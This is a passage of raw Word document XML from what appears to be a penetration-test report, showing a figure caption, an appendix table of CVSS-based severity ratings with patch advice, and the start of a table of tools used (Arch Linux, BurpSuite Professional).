          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F724D7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Snippet out of the bash history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC9EBED" w14:textId="77777777" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Century Gothic" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACEC3F2" w14:textId="55ACB5DE" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00194A65">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc119794122"/>
      <w:r w:rsidRPr="002355AE">
        <w:lastRenderedPageBreak/>
        <w:t>Appendix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="1915E219" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00194A65">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc119794123"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finding Severity Ratings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="5A6BEBF9" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00194A65">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following table defines levels of severity and corresponding CVSS score range that are used throughout the document to assess vulnerability and risk impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794888FE" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00194A65">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EBC7ACC" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00194A65">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10074" w:type="dxa"/>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4"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="6570"/>
      </w:tblGrid>
      <w:tr w:rsidR="00194A65" w:rsidRPr="002355AE" w14:paraId="5B44DF08" w14:textId="77777777" w:rsidTr="00875E28">
        <w:trPr>
          <w:trHeight w:val="170"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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FBFCE22" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162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C53C918" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>CVSS V3 Score Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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5564FED" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00194A65" w:rsidRPr="002355AE" w14:paraId="451A46D4" w14:textId="77777777" w:rsidTr="00875E28">
        <w:trPr>
          <w:trHeight w:val="709"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="188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C2D2EFD" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C708E21" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>9.0-10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35096952" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitation is straightforward and usually results in system-level compromise.  It is advised to form a plan of action and patch immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00194A65" w:rsidRPr="002355AE" w14:paraId="7B8E3048" w14:textId="77777777" w:rsidTr="00875E28">
        <w:trPr>
          <w:trHeight w:val="699"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884"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C1C1D44" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D9B82E8" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>7.0-8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51F9E9E1" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitation is more difficult but could cause elevated privileges and potentially a loss of data or downtime.  It is advised to form a plan of action and patch as soon as possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00194A65" w:rsidRPr="002355AE" w14:paraId="63AA924F" w14:textId="77777777" w:rsidTr="00875E28">
        <w:trPr>
          <w:trHeight w:val="709"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884"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18DF284E" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4419EC69" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>4.0-6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="318F5B33" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vulnerabilities exist but are not exploitable or require extra steps such as social engineering.  It is advised to form a plan of action and patch after high-priority issues have been resolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00194A65" w:rsidRPr="002355AE" w14:paraId="7DAA10CA" w14:textId="77777777" w:rsidTr="00875E28">
        <w:trPr>
          <w:trHeight w:val="548"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21BBD849" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E653E76" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>0.1-3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D1A1BD1" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vulnerabilities are non-exploitable but would reduce an organization’s attack surface.  It is advised to form a plan of action and patch during the next maintenance window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00194A65" w:rsidRPr="002355AE" w14:paraId="53364991" w14:textId="77777777" w:rsidTr="00875E28">
        <w:trPr>
          <w:trHeight w:val="709"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0070C0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00531CDB" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F86C09F" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F985D0B" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>No vulnerability exists.  Additional information is provided regarding items noticed during testing, strong controls, and additional documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64B1122B" w14:textId="77777777" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00194A65">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DCBDCC7" w14:textId="54297C5A" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00194A65">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc119794124"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Used tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Gitternetztabelle4Akzent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="1610"/>
        <w:gridCol w:w="4492"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D85809" w:rsidRPr="002355AE" w14:paraId="7F6954F4" w14:textId="77777777" w:rsidTr="00D85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FD6182" w14:textId="41DFD55A" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Name </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07927419" w14:textId="476CF299" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="187C9B95" w14:textId="066CA34E" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D85809" w:rsidRPr="002355AE" w14:paraId="1E39DE20" w14:textId="77777777" w:rsidTr="00D8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ED0CD4" w14:textId="1F9F727F" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Arch Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F11E1FA" w14:textId="3E50B8A5" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6.0.8-arch1-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C17202A" w14:textId="41E857CB" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D85809" w:rsidRPr="002355AE" w14:paraId="3C90948E" w14:textId="77777777" w:rsidTr="00D85809">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D0B36A3" w14:textId="577A257F" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>BurpSuite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Professional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="223BC9DB" w14:textId="45A770FC" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>v2022.8.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ABBAAB3" w14:textId="4E9D352C" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809" w:rsidP="00194A65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
